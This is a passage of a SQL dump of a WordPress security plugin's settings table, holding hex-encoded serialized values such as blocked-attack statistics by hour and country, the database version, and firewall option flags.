6c21902fbb36e479d4b69eee21aab95b5e18a649f0d9b74f33c708b345d8187d7b98dd1459b67aac08bd8c8f8d8723a6e2f18040f0da01f65861cdb05de7e2282963ff6bcfd0217e73f37e181068aeedeea27130f0dbc195583f38f9cc859983e0074887db692c2b7805fa0cbc1bcdb50c8c5345f0e5ae39be723d98235f7ead5ca32f53cdbb1dd906062859432f232fe0801b44f0f45e3ea5367f5cbd1fbee3e256bf3620451fe99169c72ad9582ca4902fb236f101ffdae0d7d7197d255de108768809a708821a5914fbaba80be13c9e7d1c5df11d38e6639bdc343d7d8c58ed6a1c28093b1bdfdd0f77e38167ced6b82c5c52f1823006a908246bc66f88411ead857bbfb0b886ffca3223ec98616daa882799f1835923cef24faee728260d0a30d87b7ac9e380f6c70cfb37b9176ac7e1bbe5f1a552ba769295825e30d2f5173ff8324468d934865347c6385248930165fccff1b834da8933c57a1a72ed4b2cee49de97c54f65c078a8d19f87f3697d84f32ef1cb6b51be0c175f17ea33abb039088b79070a02a362db1d2d35632c52b99612f1e88d33a3a7c5278472b4982e5d390e63cb78b7aadf9a5939ed5c137ecff318f20cc2d8c466d6cac6c7b668fd6a7d7597704958e570e2dabecea954b201a785f22fd3369d468083198f046bcd5486458f3be61148030923dbdf9bdef688cd7bf2432756dba82fc9e9485f6e7bddd44657d4ea3f5e17d5aea205569fef088b20f24e09b1e1bb132dabb2b26ab99bc713731a6a68dfbd43e1c899aa49f9ebb245f262e49dc1558b61f6c8d0cb3965d7bd52a7b207581d873fe6a590883108b1b5f26968081aced295fc8358bc54f73980a580dbf245df8ea269f0079a05d18609f276b2959526b23d479e9fe9569f6b7232ced74335b6adb8cf6df4ca7e717e8cf289b1d804060c133b726658e185b8bd936558c874a2c5aa2e1d2b5ba4b5a3fbf28e11e592a9487b76faccf22e2f737c55c85ad3c80b41a768244455b273d3cbf2ad1b01e6fa49cd7b270031c1e3e2dc118c98e4870472f8aa8e6ba68a44dfe4f2c261b263c9f6b4f6236bf451626d0e28f6b928b7a07b69615ea85c76ecb74af2d64da9944381176051413618a05fcd7e826ad363882c31aeee8c460a2937dcf2e4a9be21e840a598eb09d36e9b88f7164b5e1224db0feb4e80566aa1fdca71f2ec604a85425a9bde85884aa28c9558a0307502a60f39a03ea521ae89763192f317a0ec761faaeac485af143ea19baad0a8ee2604db449936585d6010efc73df32866798fdec332fdc9d0adcf39bce06578dc6b7aaa0542fcab34dbf21c3608f3480c79b71e2f3d9edd751634bc5f63a607b58509cebf278e9104ae4d7c34b3f367453b2b5c19b92948d07113cfdd7b9d40c364587b6132d5487fb40b3db7c4f38547cdc836436dadc53a1dee7cc4d22125a810e285037038c75567f0bf8cabf3928f02eba441e74e88d579fa716fca8523265d8f236d1256b0db95ba72c8b9f3a6c2d44ce13da6d6366d9d7a5168a819b45a88eaf6f29ce081c117d1ca43d3f3ac20b50fa8ca54afceb18888e56995bddfa0506f6d5c44357ed421c08584a0f3d097861bf9c3f765a8e5e357895f367c9716542ddd3e7bdc721d430acc3db1f3da6bc8c552648c6a80a63613bf03c4f49e5419e3cfc2eb11f8ce271282b3a2f3f992331348ce5f6378f8c54ee3029e04db706ea6a6787b7f015685ab8240d3f4106621b7b7442e53b0b04a2fde786bf96e5ab67e0f71c6ea364cea82a824d4f412af883f7b494925f5269c908112562841770eaed83ce4a9bb0184caea8d63f424d061823da5b8ae16e804b5213343b9500359ace2a12e6325c7300b623f4ff4294ded9fb499fbf8cb5bc204253e7864eb5d3f5a8a1ff1b49d9e31f58013bcf4357f8fd9ce71f629958139572f60afe76b57e8562ae08d5f695f2768ca4d61f4435157dc7e4bdb30b1587e441ece3cfd11a4cd123ecc35eb4f21095527a3f1f44961d3b4392b7fb67fe58ded36eca7da6646c903a337ab722cc1f53fcfcb4ff45093d31ae2729f286761eb9e75053b598852873ee8ba761e5cd9c23f73eb6bf45cb820b87ed06d8694e056fde27cdd90a5009989217fd4f4d9967f5836b1b6f461aa769b2f2519310855ff4564a0c85f7727b1dea297b6d74b4773b32a3c76f4752e9880f9ec11ea149753b2cd41600aa40974a7faff70279de25ccb912b26f491a12a7534aab50563091a7b050d988d88861df6a4f5406c280c32cf75a5dcf4ae2d56b004fff092ce0207e21c4acb8085a27a95d8a7600e172a122396e46af4af785ab6c926e71ade7b08430d42b65da28d06de5910e123f03c001805215ff4bc4d7e2889aaa5faad6bdce05f8d4de8d657bcd446138269895dc80bab16d3f4c1ebb6e569cb8d0192a142d9dd6c40868d6aeb21eb03004082fece1d178b03f4c5b201028e33f7b487b2707660f17239489f0b8328b663df57de8f4b228524f4c647e090cfad27b736dc499d22f31256dbc99c3dabc230b9dbfeb5bcb2f11af4c7f30cd71068d6addd863c65314ca22102d3b304f8841aaa8a44a44bbe9769f4cd402a538cc4985267d4c97fba09729013b8cd7a02def7322c6fdbcf51aeb9f4cf95ce4655f61185e96c7480b02ab31367aaa70eebd05601e298b2c3b9c7cbf4d7d4dbac83a3426ac64c4e83f902685a01eced652593442789c7fc477d77eef4e545cf6b2a1809aacf57d88c6a06bba17c8195c24b2792a06cd70110c8883cf4edb28ad3c7d2ea66641555c8c6acb6e682c9c85ceaaf6648dccbebf6f77684f51249ac499add77df64a61d3422b0e98697d1e0ded230145fd511eb68ed5e31f514a0ca2de563d60c6a04a6487466ddacd33ff3e1ca4429c427b7d66863462cf534af7c69d3516cb070a7ea1174f73e0bf12505791da3a8b2e43150a56242fcf55282fda681f45b427d960f1f0a5b8cda1edc3b094932710be8911e55d43ee5f56e29cd84b8ba497801b4f1b456055624ba04cc5a3dbe9471c5554ffa90e063f583efe60ad4c7cc34900d1d27529f320716e438cf46283e461cf084322094ddf594c222516a36bf68b317eb2715965668a6ad177ec619c641641892ba8037dcf5a6449a106380c9dd41891ab548af7a79ddc04993edee03ea51e8895d911c6ff5d2253cbbb0444eab4e03198bf74d9e5ef3ae5ebabe2f6a4339f2746296a670f60d3ceb2121648e659f70f51cc21ac2f6141209a530086d7a93c3c71798e925f61a021b4e18fa8af13a874a30bcb24c10a9f0329de6fb224cb1ede2af9c74c2f6253e9c813a31b88f5799b552bfdad8128acda9b0c20551d46982f17ed55e47f67672926047e1cc83ce53fd80b084a9c22420e1c132157c82a83ee9f50f8959f6774dfc575bfeeb20b4df0149cbee2faf482d6a0d25e84492b0b3c9141f8880f6832baf5034d5110b672ebde09ec41f7bcee1cafe5e579cc42f211b5b71758ff688cd5420ae2667c996d00d032e85c43ad8291da751d9dd378bdda3f0209968f6b322629f592856ddd157cb7c2f355bfd0872f0c9b72acfcad04d96dad46c19f6babf72e1fe126ea9b67a195784fa6d3a66f84f2679281eeb48dc1bb4e3d4f9f6bb0aaa235f46af443ab1aed53149d37d55220048d8429f2660c638fb806d10f6c82155a163251c1105725417a09407eae32eaa8d71837886ebb9049e183d00f6dad422f849e03863ef5fdd3ba26be036bdf9521ba4728be702453f7b64c2c2f6dd475fcd41949bea3702a9bc9cc363302b9bd95e45cee96831eee4847bebf3f7023955cd2cb78ede1d256b3113580c9d030d204c6316904eef893bbd3c4bcef7067b962ad2fa19196b934ca40ebd9ccdfd96ec452ccd742aab4ab82e09ec97f707bcbb0f1d2ae6ad815c359cb5639d25aa61fba4509f54c19b67b30478c8bbf71d3d97dc7c409420d483c4d95caf9b4856713218aace7635c26fab9b2c9900f737fb49d1b4f94587b3a399c639302e424165b5343e0b8f5d79fe5382506b99f73dfc3969cef06643751d096c36458023f15a742c17233c8b1a4cc7345abcb4f75a3c2602c15e8753dbdce88e56c4c03fbdc0ba5286c38a0e14a55d80820984f7decdae36ddd8f4bb52be8ad4a40e7a86a4388d5c7f3494f9771fe6c4638b0ef7df798ebc80dd739698f84d99293940f38aa3eefec9f08a32ee8bd0c1d82ec1f7ea56fc2f42b0ce63356197ba0d521749a0473e3f15a3a8e7793bcd2b9afa89f7f427f90807534145a6443eccd31cc6de717161e75f01cacbd8884b29f441baf82fbaf3b1595180b03ba523e636cc7963e4c88cfa1312ca97c9086affdfc84cf832a9cb2d5bd12033bbe602fd5d530eb3b39d2eef07e35cfe059f30d794a3d5f8422f0ac96a01937a270361e713fff418b8b7a7f8bdf7d913d51346f0904c1af8487f2d12044c09602470312f3e3a7297fdde0756a0c7990c3d3d7bf0cd4f72f8520edc7867d34a390547303e7ad71b6326f6180b49c38662347ea82a4caa51f8526b67210b1e690110cdef66a66e622e2aebcdceb7dbd8f0a21624cf6777cbf85417ce0ba9233b3fb2da6016d23fd0c93b228ce841e4f6597c9dfb97583b75f861f416773f6f6194e6ee624e248d06b26749ccf608cff4f52bc70fb7e1522ef865ee1afae8e0c0f470740bf1b5d6e1a388a5c93a1aa4066027381cc1790660f895a5778957f0f630e3dbc850b7aa520386c687b2ee5db150f664abde242a48f89d0b390a3f9a677b1cd1f701a5670b73fb0967164fc801e0589e0349d8236ef8a4a82146042359c8bc76227ce93ae0ddaf4347230a59b9455b8291569f77cef8b969a225a82d2546fe00ebe5c01c5b986eee31530190618eb1d32bd2d3e45df8db42aa4532d87396c58e29963fd49f8d13cc42b0091eeea42a15e85a9c4ffff8db926e2b8f7afc60df9718ddd7085d11a35e8ee99124bc649b67cfd24766bcf8e76de4b04738b2407e6e7ff3f13fe20978b6c42ad5917808bd6bfbfe53018bf8eb9eb539c0a6b201fa945504d75281ddbc22a54549bc207b86607ae5eb2484f8eca8807107ed10e6eb5a3668d6b24318be86523da6133848a089ce90d4c93cf8edcd3e021be61379eae879e53df4fb20f4d883950fcf47f2d5d3a917269891f8ee30fdd42a97b7b2fc75e30014758d0d99e62b4d0a4dc6bf1f06d33480f866f9045f9e4d4785e0e6253271b9e5be3008e82fd2933a3be585ea65e457a44792f910ca88dd50e4c42cd4f64bb494415d48d4faeb25e9f3fb1ced10a641f5e651f94412e6b4db9e1256e89ab97852420e427925c468d15776b3cec7b66dd87d6ef9479f942e20d583bb6782f93fc283d072b0d0a20e6a1e73245f944426d697bbf948abb2e19dad057325e2fac60376fc782d10e2e8ee23f5bfbc813f09e4ea11f954a5b9b435e1ab29dff85c4e700e9ab1b806c1031de85b8ae1143ebbe426acf95d8c9106e28817f73a18ff9cf82ebbd1a5d78784a2cc341bf69a9e558b8edaf9686e6cb190c368c0c8caabcd6a46ac2a2a1a8c06b5f357ee6e6672502333caf977d6a224d8e98fd5eda1c2a108e6a1983304febcad4407c75cc85ba249a380f9979777448d3d4f246c1add049ef0efe5499de2393c80e730106f78e9bc3e13f9ad4c31a0cc1a3f96afeaf766e85d0cc5fbd0743210d08898e8f235fbb2fa03f9b3499876cb17a80b43c028aadfb1777a699b11a543003338a72755881593e9f9b524f65301aaa228d45d34e250b6d31595bfbe6355dc76c5e1a2ad9728af63f9cd84c9affd54cebdda90245ffd83e2f5aea553f815eaf189a9f181d08ade7cf9d07c85e5d96ed3e34493019d7ebd0896762db33b2688b9e357eeb29aa5300ff9e13be4e937cb0b2291164c7ede85bb4c45ba602119e0296cccca9bfd687f4cf9eb4fd82fcca9338dbd047a348fce9afb433a55667a5e155e476ee7f5b4e313f9ec8d2fb77052319143faccac321130b03280084abdce8d0f3cb1913ab71d5ff9ed4221732afeb9c36caab07ff636c7d5d822515ffdc8b9a932ae0fb69a6137f9ee3c5c557dcf220c41a808b4b273dcc23f97dc433987bbd21ff160c272abc8f9f0301bc38989cf05c3eef200e8d831bc02d679a369fa4e01372c4e5ddc38e4f9fbcfaabe8efc98ccc413cddc431f912c30319b53cdad18e72d80619c16bd62f9fcaa7059ed787b5663deff6f80f86c4e47a2717f6c6b6287a1f9f10fe1a661fa0ff2c3b1d49f877962d01bd640cb59d3e4d4284a357dd7b8649374604d751efa18bccc0fc6821180557a5be7ba775c3dcabc005b0a4b8d6978b52d623eb4c5fa2c0345fd64bdd294e00a4edf2d8eebee00b4398d04704d302b12b1bd7e309ffa3a3672c2bd63c9cf090385e2687b804d5cf3b6d2cbd04aac9a2cba6b0d3ffafa4f1a2fde866685bde03fbd78c88339bafa0d085150400def14cc1abee1c1fbfa53d27af3bdac0ab3c045b44f8c93b5c777462e50f9ea296e3eb3f93cf1cf18fa5707a8ce1c5329bf0887d05fd75db5e6eac31959ff618a276b59b9add9ffddfa5f6f74eb72e3a329cdd643a7010393b9d945ae490bc76d2fbd3bd7efe0eb67fa67bcc5ad148e8bc6b1d2e03060fcaea3385ef9f9ec5c82a6c68bfd7e0e96a0fa7e924ab1cc3715246b5373596d65280bb07c01a3822eb890c5b97a5ae0c55bfaa2b8aaebaabe6cb063e9ec9d8b858f8a71da6fd79f07a19db84b1fc8d69b2bfab0ba25edd882c32161ce32390adce3c8ffbd120c60a8465f066894a02a8a79faba072eb65ab1dbad50ee1030b7a82280926a85c5ce0fa73d78610e740e5c4bfad7680193a3e139a6f519c0e477c78fd0c4edbc903b5a29f5c2ee4bfe7ede18fadf51825b063a3addfcb46a9e7390ded8065e5a4007326ee2ecb3766529655ffae40575ee82e9ee2105c539bd5db47765103cbbb987ce81b9694a6b164e901ffaedb54253195485aabd18f0a068c25a73a92a1286f7b28f5b3f09504fb49376faf3041d44c58c692aef8e62f7d5da2aa13bd8a94493daa8b26ef3082f4ee09cfafa0482be736804ab7712eda5e46b315dff273af22665bf7490a462af74f1eefaff2ace0a27bc5a25b1c0245ed9f2f4112ab942a5fc525f7ef13b410b8a95f2faff6b38abdae6f35c3d03863e1c4af5b9bac431edc07e288be6e9410e63ef71fb026f255446fe04154f012dc1477ac24a544e3eda27bfd9f1fd8294e798232efb0b44a53db1f4f8d2d961de3af4df27036a954bf9e4042057485392aadc1019fb18600dc8797e45e47e7c880a5208cb6929666c97e9a59465157de3296c647ffb2af4c38049f146aa5e0f8290c8af97dc92ec89e557f892e9409e7ebddd98c7fb54ca60c86ca9ecc020de39be98e79daa5017de6bd64b56d2e264aa15dd2ae3fb62fd1db87afa4870c066c09c3ff740d198ddb2e049a0f9b6be8a471d0fb15dfb71d34d173b8cd53e6c0a4181edb50e8e3ee5ce6b9868c7d8dd52bac6f13808fb794fac018a741eef6c641bf455d0fd5ec1ad45a1254f88f06e17deb9c17e7dfba9904a5baa416e3e149ae3a2c8503ab29be9c3c60f37e0eeab3469778c9deefbadd9718fef0863e773cf204080222fe4d9c1c5a1027c73507c309b91c3b4fefbb08a2101a74ac9c85b683765935eef4a9e8f5411ab75b556b09419da85f236fbb5bb62064a1df1b3f5195207eaa9230f8cffd4b28b5975a26ee96e4f969cfbfbe463810a7f17697abd4ea379d78aecf4b47dcb9c2edcfeecae1abb5ea1ad9afc0af8782b8fa955c77fd731ef9b77ebee807a9c080829ad220e34842bdc425cfc19ac7f92494912ff25b825e822d096589f9c04a2e57e58343b3bdd5d2ac509fc26c6f4b91ff42254d1fe5157765269bab264fa33926d07fe6061c515f8330dfc3435711d24a826ce923951194f2a127abd066b42858e80bdb59efe6a64452cfc54678b4f72507e18f874676e0ba9679ac9ed28b857a67b1376a8ead1cd5ef4fc5aace87dc8904336dd9ef7ab2b913f05148b04dbb85a03f850cb1d643f0250fc5cc4d2f9e80c836b4fd7fdc3f87d48a62246ef192b3accb54c045a924b4104fc78a18bc7c272bc5e2ffba3ca27f044877eec9534e864f40bcd0ec260386071fca70772d7c092d87c1ae9e3829035ac62e18a5432bcaecb70683db416b1df0cfcacae97a76a068e23cf6a528585cfd509f0aa8fa8da7c877ac2fe1ffc3033c5fcbedcb84f5631a8536c1766771756e7a6ce31090ffcd86c3f1dce01952e0d95fcc6a8903b7090b88f2de4a4652aeed2d115041f609e8802ca5beda7703555fffcd8cdb3a7d0e1a67b159ca3e16ea5bfc2217a5bdb0f3e17b566b87434898f10fceef7735ea67404452b5712ea4cead5af89e8ffa618438eeaf8d2a9cf874803fd07689f5a3b50e1c82ea4e7f3cb732e1eb89d31ba9b7f71fe2bdc8b0d9234cafd245064b5755531b9c8f4d7389b97f03c044b6ee27307a1b5c0708d4752f762fd3a4cc0c330f1f7ac6a017d1b1ebc7995ec8a9f57c41ebfc75368a101354748fd3bdb5683ad28fc04ca28c61a420012880dcb6cc59799e0c242e473b0230633fd3f2be6ea875770e2a450be4de76b5dbc3c7078195fc12252dd4c6b69a09847fd475050f9281fd4cf9ec1d3ee53cbe13351fd3f28487c2c081ef83b70088af1fd48401379c684bf9d6b7dcc7b8caf5babc7577b8c4c47cd2ee1764fc7ab9e22fd4d1f0d364963c4f7bdfd81f24591ab2c084d2b2ca21ec796b8e516668a9e20fd4d50e6865bb05926e5f0a8cf0d0c8aaf142cb7a1eb594478cec278e618a9f7fd56de8c981aadd27eb45644e907d9c95a360bdf6157cac05fe0f7a274caa96bfd67ec690ac142b15fc8ea5b95008bdd37a202d934f21c7735d7d8cc71e1eb82fd79b0059fe415da31b1d0a933ab261c10b35474ddc8b9a3ea3881803de2cb53fd7f50b679f3596dededab88fb6db601e6bd55ed4902b6e6cf4fc046092195f9fd8eee0b9b71c0ac4fe7a47ec3be608fb7cfb73793692e4bfedcea4b9db404ecfd9c9dfe1d1c3b8ca23340a286228e0cc15f05d211938164aa082f35bff01481fd9f8fe02583b4dbe839941855363ef7814e63b0568a4db05470f757200d30a5fda4e4e7815a7c9b5c8e541d892d87b142fd0b4422d02c51c375dcb3c1f76ea1fdaf8fa62e9890c7edf1da411addca58a66d2c19ace9500b0d0beb974ab768dcfde378c55123929b000bc2810c89c07467fba4f2a10846aac1ce4e1da1f5df76fdf3269b5722fc14c4b2907d3a800eaef17f6bd553e0f72d652673f16314f401fe193168e9d8975d6d33c4ba58711eb0c38ff7ec6ac25fde79ae5b2b78f245e8fe1cc756307ad906ea0cc1781769071f9dc705fe0accedb27fdb469e0acbe8b7fe3791db34c6e6ac8b1f5cf3a04d7fe83d84b0e64f82a19d960668b3bfa39992fe4c3b952dbace46d2c400d313d955b11f832a2fb797d613d664e32e3e7a5fdbfe4d45c84dd58f2d2f76c4e75fda8563929ce2afe93f2c5526fcdf22968b0852fe5be098bc52e1b1c6d8e17c4cecf58c1d95a71e3c750551529456b3a4a0b878fe731fa08f09625bd079a669cf43e0e2a8f500f6e2f4e3040c54fe7140577e87fe7b99e1b99c6711f149553918ff0081c5d8daa15377ed7192055c284c70525efe9d5f6dcb6f021bb2103c0165c7e77b840f104645b2500a2dc0e1f0de2c3548febc3aa49c40bee614c60de0251cb7ad2d8399bd0f1c18bde02c2479b7c36be8febf135cfd3386eb94a2df937bbd42329741e10399ead61247d9133c8a902625fec1f9dfbc7724029ea699638e54115615c2b60d897c6607f8376843c1701ad0fedd389a778147fe2b8919645578d1d5586388d1a856f22a15bf36d86928ce07fee5481bd6587f77d9365bf2fe7cfd4a61d9cdb4e7d0961e151bd2715e07fca5feec4f9e0b683b7841f433d7f72d0dacf017e89d684d9c3e6b101c7637a5c55bfef29eded78764a3cc827a523c02af19bf32f5eae84b88aed3d8c33789490793fefd49c60b1c213126996ab6875b369bbc889a353669b938e7139b02156e9e74fefd6c992affc7f1073fb788f2bd2f5dc01af834eda8b97458ea2afdb9f235aeff0632f32e1870b2c2b7d02284469c02365ad8990ab9dd0f247a8cf77ab8a40dff1439605c265339e27e7b2d134c4bc59d1049db54966918d8ef3b957521aef6ff37f4ffb19855cd65b048113e202df49d1b10e42547a0b5288c6d1dce0098f9ff440f4f3b86995ef14bd4e48f6cb5bfbd80d8b821e02f3f614607d37aecf223ff55b32566f605eead7bf878f313ca698c3ce712b966af9c3baf98b5969a894bff5a39deb04efadd576a5f8948f1ac5dcfcd9a569449f952155beb839bd61042ff77f09a73b0d0624e7dbc715985c7fd377a6f9555e61eaa75f427a1a5d61e31ff90136bafae927e502c6ffc0ca8c1ca820c2d7ea642cabecb693e311db92f23ffb41ede23f6db799a8b1b587fd46f61aa855c4481c59e68136562a40589f518ffc2e0681083e63f299733168ebb31e075f39f1ea17398de5f73f1b3a2d0a864ffc43e56a02a52889f2f12009888f2dbe3d3b714ef7e72c6258d22d2cae69ef2ffc5f2386c620cd817cebaffa7229e37658e458c3d6e7edbd1cd992732d5432fffd63fbb9b0943bf5196bedb63322047838294e21893bd65e5de68a3e468ef91ffdadd8c5edd40f3cbb65c057d2c6ed1dc1cbfdb9b7e41eb46d7022c11ec1018fffd7bc53c6e97d0bdaf3e21c4ed32faa45f55d6647e11a0de701cd8e7b2374f223b7def725098f2f20100, 'no');
INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('currentCronKey', '', 'yes'),
('dashboardData', 0x613a343a7b733a393a2267656e657261746564223b693a313539363937363834323b733a333a22746466223b613a333a7b733a393a22636f6d6d756e697479223b693a353731303b733a373a227072656d69756d223b693a353731313b733a393a22626c61636b6c697374223b693a32333038303b7d733a31303a2261747461636b64617461223b613a333a7b733a333a22323468223b613a32343a7b693a303b613a323a7b733a313a2274223b693a313539363838383030303b733a313a2263223b693a363638333933343b7d693a313b613a323a7b733a313a2274223b693a313539363839313630303b733a313a2263223b693a363534373733323b7d693a323b613a323a7b733a313a2274223b693a313539363839353230303b733a313a2263223b693a363433313137383b7d693a333b613a323a7b733a313a2274223b693a313539363839383830303b733a313a2263223b693a363833363934383b7d693a343b613a323a7b733a313a2274223b693a313539363930323430303b733a313a2263223b693a373835363234333b7d693a353b613a323a7b733a313a2274223b693a313539363930363030303b733a313a2263223b693a353532323139353b7d693a363b613a323a7b733a313a2274223b693a313539363930393630303b733a313a2263223b693a353436353630313b7d693a373b613a323a7b733a313a2274223b693a313539363931333230303b733a313a2263223b693a363831383237373b7d693a383b613a323a7b733a313a2274223b693a313539363931363830303b733a313a2263223b693a383032383636343b7d693a393b613a323a7b733a313a2274223b693a313539363932303430303b733a313a2263223b693a363836333636373b7d693a31303b613a323a7b733a313a2274223b693a313539363932343030303b733a313a2263223b693a363336303232373b7d693a31313b613a323a7b733a313a2274223b693a313539363932373630303b733a313a2263223b693a363030343330323b7d693a31323b613a323a7b733a313a2274223b693a313539363933313230303b733a313a2263223b693a373433393037363b7d693a31333b613a323a7b733a313a2274223b693a313539363933343830303b733a313a2263223b693a363032363833393b7d693a31343b613a323a7b733a313a2274223b693a313539363933383430303b733a313a2263223b693a353232383835303b7d693a31353b613a323a7b733a313a2274223b693a313539363934323030303b733a313a2263223b693a353638313730383b7d693a31363b613a323a7b733a313a2274223b693a313539363934353630303b733a313a2263223b693a373032373133303b7d693a31373b613a323a7b733a313a2274223b693a313539363934393230303b733a313a2263223b693a373934333136393b7d693a31383b613a323a7b733a313a2274223b693a313539363935323830303b733a313a2263223b693a363436323139303b7d693a31393b613a323a7b733a313a2274223b693a313539363935363430303b733a313a2263223b693a353335383134373b7d693a32303b613a323a7b733a313a2274223b693a313539363936303030303b733a313a2263223b693a353432383435373b7d693a32313b613a323a7b733a313a2274223b693a313539363936333630303b733a313a2263223b693a353532383231343b7d693a32323b613a323a7b733a313a2274223b693a313539363936373230303b733a313a2263223b693a353338393938383b7d693a32333b613a323a7b733a313a2274223b693a313539363937303830303b733a313a2263223b693a353334343338313b7d7d733a323a223764223b613a373a7b693a303b613a323a7b733a313a2274223b693a313539363332363430303b733a313a2263223b693a3133393838383538353b7d693a313b613a323a7b733a313a2274223b693a313539363431323830303b733a313a2263223b693a3133373334333234363b7d693a323b613a323a7b733a313a2274223b693a313539363439393230303b733a313a2263223b693a3133393735343133313b7d693a333b613a323a7b733a313a2274223b693a313539363538353630303b733a313a2263223b693a3133373431353031383b7d693a343b613a323a7b733a313a2274223b693a313539363637323030303b733a313a2263223b693a3134343739333638393b7d693a353b613a323a7b733a313a2274223b693a313539363735383430303b733a313a2263223b693a3134333331303735383b7d693a363b613a323a7b733a313a2274223b693a313539363834343830303b733a313a2263223b693a3134383731363430333b7d7d733a333a22333064223b613a33303a7b693a303b613a323a7b733a313a2274223b693a313539343333393230303b733a313a2263223b693a3132323936303035313b7d693a313b613a323a7b733a313a2274223b693a313539343432353630303b733a313a2263223b693a3132353739313537373b7d693a323b613a323a7b733a313a2274223b693a313539343531323030303b733a313a2263223b693a3132333131323235333b7d693a333b613a323a7b733a313a2274223b693a313539343539383430303b733a313a2263223b693a3133353732383032333b7d693a343b613a323a7b733a313a2274223b693a313539343638343830303b733a313a2263223b693a3133363939383839343b7d693a353b613a323a7b733a313a2274223b693a313539343737313230303b733a313a2263223b693a3133383538303934393b7d693a363b613a323a7b733a313a2274223b693a313539343835373630303b733a313a2263223b693a3133303833353336323b7d693a373b613a323a7b733a313a2274223b693a313539343934343030303b733a313a2263223b693a3134333031323538343b7d693a383b613a323a7b733a313a2274223b693a313539353033303430303b733a313a2263223b693a3134303933343730323b7d693a393b613a323a7b733a313a2274223b693a313539353131363830303b733a313a2263223b693a3133363038393332393b7d693a31303b613a323a7b733a313a2274223b693a313539353230333230303b733a313a2263223b693a3133343934353435343b7d693a31313b613a323a7b733a313a2274223b693a313539353238393630303b733a313a2263223b693a3134303932323439363b7d693a31323b613a323a7b733a313a2274223b693a313539353337363030303b733a313a2263223b693a3132353832333730303b7d693a31333b613a323a7b733a313a2274223b693a313539353436323430303b733a313a2263223b693a3134333635323835323b7d693a31343b613a323a7b733a313a2274223b693a313539353534383830303b733a313a2263223b693a3133383238333536383b7d693a31353b613a323a7b733a313a2274223b693a313539353633353230303b733a313a2263223b693a3131363839353735303b7d693a31363b613a323a7b733a313a2274223b693a313539353732313630303b733a313a2263223b693a3132383531373537303b7d693a31373b613a323a7b733a313a2274223b693a313539353830383030303b733a313a2263223b693a3133373933363034383b7d693a31383b613a323a7b733a313a2274223b693a313539353839343430303b733a313a2263223b693a3133333639353135353b7d693a31393b613a323a7b733a313a2274223b693a313539353938303830303b733a313a2263223b693a3134313433353936393b7d693a32303b613a323a7b733a313a2274223b693a313539363036373230303b733a313a2263223b693a3134303336363235353b7d693a32313b613a323a7b733a313a2274223b693a313539363135333630303b733a313a2263223b693a3132393830353134373b7d693a32323b613a323a7b733a313a2274223b693a313539363234303030303b733a313a2263223b693a3133343737303933303b7d693a32333b613a323a7b733a313a2274223b693a313539363332363430303b733a313a2263223b693a3133393838383538353b7d693a32343b613a323a7b733a313a2274223b693a313539363431323830303b733a313a2263223b693a3133373334333234363b7d693a32353b613a323a7b733a313a2274223b693a313539363439393230303b733a313a2263223b693a3133393735343133313b7d693a32363b613a323a7b733a313a2274223b693a313539363538353630303b733a313a2263223b693a3133373431353031383b7d693a32373b613a323a7b733a313a2274223b693a313539363637323030303b733a313a2263223b693a3134343739333638393b7d693a32383b613a323a7b733a313a2274223b693a313539363735383430303b733a313a2263223b693a3134333331303735383b7d693a32393b613a323a7b733a313a2274223b693a313539363834343830303b733a313a2263223b693a3134383731363430333b7d7d7d733a393a22636f756e7472696573223b613a313a7b733a323a223764223b613a31303a7b693a303b613a323a7b733a323a226364223b733a323a225553223b733a323a226374223b693a3430383336313435333b7d693a313b613a323a7b733a323a226364223b733a323a22494e223b733a323a226374223b693a3139303331383539393b7d693a323b613a323a7b733a323a226364223b733a323a224652223b733a323a226374223b693a3136353334343638343b7d693a333b613a323a7b733a323a226364223b733a323a22434e223b733a323a226374223b693a3132393631313137343b7d693a343b613a323a7b733a323a226364223b733a323a224445223b733a323a226374223b693a38303534353130323b7d693a353b613a323a7b733a323a226364223b733a323a224252223b733a323a226374223b693a37393336323239343b7d693a363b613a323a7b733a323a226364223b733a323a224742223b733a323a226374223b693a37393039373730353b7d693a373b613a323a7b733a323a226364223b733a323a225347223b733a323a226374223b693a37353139393532313b7d693a383b613a323a7b733a323a226364223b733a323a225255223b733a323a226374223b693a37343231313035303b7d693a393b613a323a7b733a323a226364223b733a323a225541223b733a323a226374223b693a36303930373838313b7d7d7d7d, 'yes'),
('dbTest', 0x613a313a7b733a353a226e6f6e6365223b733a36343a2263613635336161386135336437613534396266333632666539383863633635386661343730313266396665643666623437363432653662633462343161653737223b7d, 'no'),
('dbVersion', 0x31302e312e34342d4d617269614442, 'yes'),
('debugOn', 0x30, 'yes'),
('deleteTablesOnDeact', 0x30, 'yes'),
('detectProxyNextCheck', 0x31353937343835373130, 'no'),
('detectProxyNonce', '', 'no'),
('detectProxyRecommendation', 0x485454505f585f5245414c5f4950, 'no'),
('diagnosticsWflogsRemovalHistory', 0x5b5d, 'no'),
('disableCodeExecutionUploads', 0x30, 'yes'),
('disableConfigCaching', 0x30, 'yes'),
('disableWAFIPBlocking', 0x30, 'yes'),
('disclosureStates', 0x613a313a7b733a32323a227761662d6f7074696f6e732d6272757465666f726365223b623a313b7d, 'yes'),
('dismissAutoPrependNotice', 0x30, 'yes'),
('displayAutomaticBlocks', 0x31, 'yes'),
('displayTopLevelBlocking', 0x30, 'yes'),
('displayTopLevelLiveTraffic', 0x30, 'yes'),
('displayTopLevelOptions', 0x31, 'yes'),
('emailedIssuesList', 0x613a383a7b693a303b613a323a7b733a373a2269676e6f726543223b733a33323a223737343063333661623037356539653437313538666430643634326537386633223b733a373a2269676e6f726550223b733a33323a223737343063333661623037356539653437313538666430643634326537386633223b7d693a313b613a323a7b733a373a2269676e6f726543223b733a33323a223164366161343934623638616661343830666639386132396538646439323538223b733a373a2269676e6f726550223b733a33323a223164366161343934623638616661343830666639386132396538646439323538223b7d693a323b613a323a7b733a373a2269676e6f726543223b733a33323a226334626363383561313766636663646466353465636564303665636139356637223b733a373a2269676e6f726550223b733a33323a226334626363383561313766636663646466353465636564303665636139356637223b7d693a333b613a323a7b733a373a2269676e6f726543223b733a33323a223631613332626233636430346337656164643964373366373236366238376466223b733a373a2269676e6f726550223b733a33323a223631613332626233636430346337656164643964373366373236366238376466223b7d693a343b613a323a7b733a373a2269676e6f726543223b733a33323a223362343639633162306664656164376364363066646233633130666638636135223b733a373a2269676e6f726550223b733a33323a223362343639633162306664656164376364363066646233633130666638636135223b7d693a353b613a323a7b733a373a2269676e6f726543223b733a33323a223432613836353334663236326262306532616532656438646534386133626163223b733a373a2269676e6f726550223b733a33323a223432613836353334663236326262306532616532656438646534386